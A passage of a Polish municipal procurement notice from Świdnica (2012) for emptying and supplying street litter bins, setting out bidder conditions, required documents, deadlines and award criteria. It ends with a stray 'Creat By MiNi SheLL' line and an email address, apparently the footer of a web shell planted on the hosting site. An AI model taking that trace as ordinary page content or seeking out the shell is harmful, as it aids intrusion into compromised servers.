23) ul. Mennicka 					szt. 3 ( poj. 50 l )
24) ul. Księcia Bolko				szt. 5 ( poj. 80 l)
Razem       szt. 113.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający w oparciu o art. 67 ust. 1 pkt. 6 ustawy PZP przewiduje  udzielenie zamówienia uzupełniającego stanowiącego nie więcej niż 3 % wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.51.32.00-8, 90.51.13.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Oferta powinna być zabezpieczona wadium w wysokości : 5 000 zł (słownie: pięć tysięcy złotych).
2 Wadium winno zostać wniesione przed upływem terminu składania ofert, tj. przed 
07-05-2012 r. przed godz. 09:00.
3 Wadium może być wniesione w formach określonych w art. 45 ust. 6 ustawy Prawo zamówień publicznych</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli  przepisy prawa nakładają obowiązek ich posiadania, tj.
a) Wykonawca wykaże, że posiada zezwolenie Prezydenta Miasta Świdnicy na odbiór odpadów komunalnych od właścicieli nieruchomości o którym mowa w art. 7  ust. 1 ustawy z dnia 13 września 1996 r.  o utrzymaniu czystości i porządku w gminach ( jednolity tekst Dz.U. Nr 236   z 2005  r. poz. 2008 z późniejszymi zmianami ),
b) Wykonawca wykaże, że posiada  zezwolenie  starosty  na transport odpadów komunalnych o którym mowa w art. 28 ustawy o odpadach (tekst jednolity Dz.U. Nr 185 z 2010 r. poz.1243 z późniejszymi zmianami).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca  w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - to za ten okres potwierdzi wykonanie usług (a w przypadku  świadczeń okresowych lub ciągłych również wykonywanych) odpowiadających swoim rodzajem usługom stanowiącym przedmiot zamówienia o wartości łącznej nie mniejszej niż  200 000 zł brutto,  w tym jedno zadanie na kwotę minimum 50 000 zł brutto,  z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że usługi o wyżej wymienionym zakresie zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi spełniać następujący warunek:
- posiadać lub dysponować bazą sprzętowo-warsztatową zlokalizowaną na terenie Miasta Świdnica lub Gminy Świdnica,
- posiadać aktualną umowę na składowanie odpadów komunalnych na wysypisku lub zgodę właściciela (zarządcy) wysypiska śmieci na przyjęcie odpadów komunalnych  z terenu miasta Świdnicy,
- dysponować sprzętem w celu realizacji zamówienia. 
W tym zakresie zamawiający wymaga, aby Wykonawca dysponował niżej wymienionym sprzętem: 
- pojazd specjalistyczny (przystosowany)  do transportu odpadów komunalnych zabezpieczony przed wysypywaniem i rozwiewaniem odpadów o masie całkowitej nie przekraczającej 3,5 tony (w opisie sprzętu należy podać sposób zabezpieczenia) - 1 szt.
- 377 szt. jednakowych koszy ulicznych o pojemności minimum 35 litrów, maksimum 50 litrów które są stabilne, trwałe, odporne na warunki zewnętrzne i akty wandalizmu (w opisie sprzętu należy podać typ kosza, pojemność, dane techniczne, materiał z jakiego wykonany jest kosz ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje 2 osobami posiadającymi wymagane uprawnienia do kierowania  pojazdem do transportu odpadów komunalnych o masie całkowitej nie przekraczającej 3,5 tony. 
Wykonawca posiada średnie roczne zatrudnienie w okresie ostatnich 3 lat a jeżeli okres prowadzenia działalności jest krótszy to za ten okres nie niższe niż 10 osób.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że posiada środki finansowe lub zdolność kredytową w wysokości minimum 100 000 zł ( sto tysięcy złotych ) oraz, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na sumę ubezpieczenia nie mniejszą niż 50 000 zł ( pięćdziesiąt tysięcy złotych ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- dokument potwierdzający posiadanie lub prawo dysponowania bazą sprzętowo - warsztatową , zlokalizowaną na terenie Miasta Świdnica lub Gminy Świdnica (załącznik nr 10 do oferty Wykonawcy),
- aktualną umowę na składowanie odpadów komunalnych na wysypisku lub zgoda właściciela (zarządcy) wysypiska śmieci na przyjęcie odpadów komunalnych z terenu  miasta Świdnicy (załącznik nr 11 do oferty Wykonawcy),
- zobowiązanie podmiotu do oddania do dyspozycji Wykonawcy niezbędnych zasobów . Zobowiązanie musi wskazywać przekazane zasoby ( rodzaj i ilość), wskazywać okres ich przekazania oraz formę stosunków prawnych łączących Wykonawcę z tymi podmiotami- zgodnie z rozdziałem 7 pkt. 7.5 SIWZ,
- dowód wniesienia wadium (załącznik nr 21 do oferty Wykonawcy),
- pełnomocnictwo do podpisania oferty w przypadku , gdy ofertę podpisuje osoba (osoby nie wskazane w dokumencie rejestrowym) upoważniona do składania oświadczeń woli przez Wykonawcę  (załącznik nr 22 do oferty Wykonawcy),
- pełnomocnictwo dla pełnomocnika składającego ofertę w ramach oferty wspólnej 
(załącznik nr 23 do oferty  Wykonawcy)
- kosztorys ofertowy -załącznik J do SIWZ (załącznik nr 24 do oferty Wykonawcy ),
- zaparafowany projekt umowy - załącznik K do SIWZ ( załącznik nr 25 do oferty Wykonawcy),
-</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmiany umowy wprowadzane aneksem zaakceptowanym przez obie strony w następujących przypadkach:
a)  jeżeli zmiana umowy jest korzystna dla Zamawiającego ( korzyść ekonomiczna, techniczna, eksploatacyjna ),
b) jeżeli wystąpiły okoliczności, których przy dołożeniu należytej staranności strony na dzień podpisania umowy przewidzieć nie mogły, a wynikają one ze zmian przepisów prawa, które nastąpiły w czasie realizacji zamówienia
c) z powodu okoliczności siły wyższej np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć, w szczególności zagrażającego
bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.swidnica.bip-gov.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Świdnicy 58-100 Świdnica ul. Armii Krajowej 49 Miejskie Biuro Przetargów pok. 124 I p..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.05.2012 godzina 09:00, miejsce: Urząd Miejski w Świdnicy 58-100 Świdnica ul. Armii Krajowej 49 Miejskie Biuro Przetargów pok. 124 I p..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com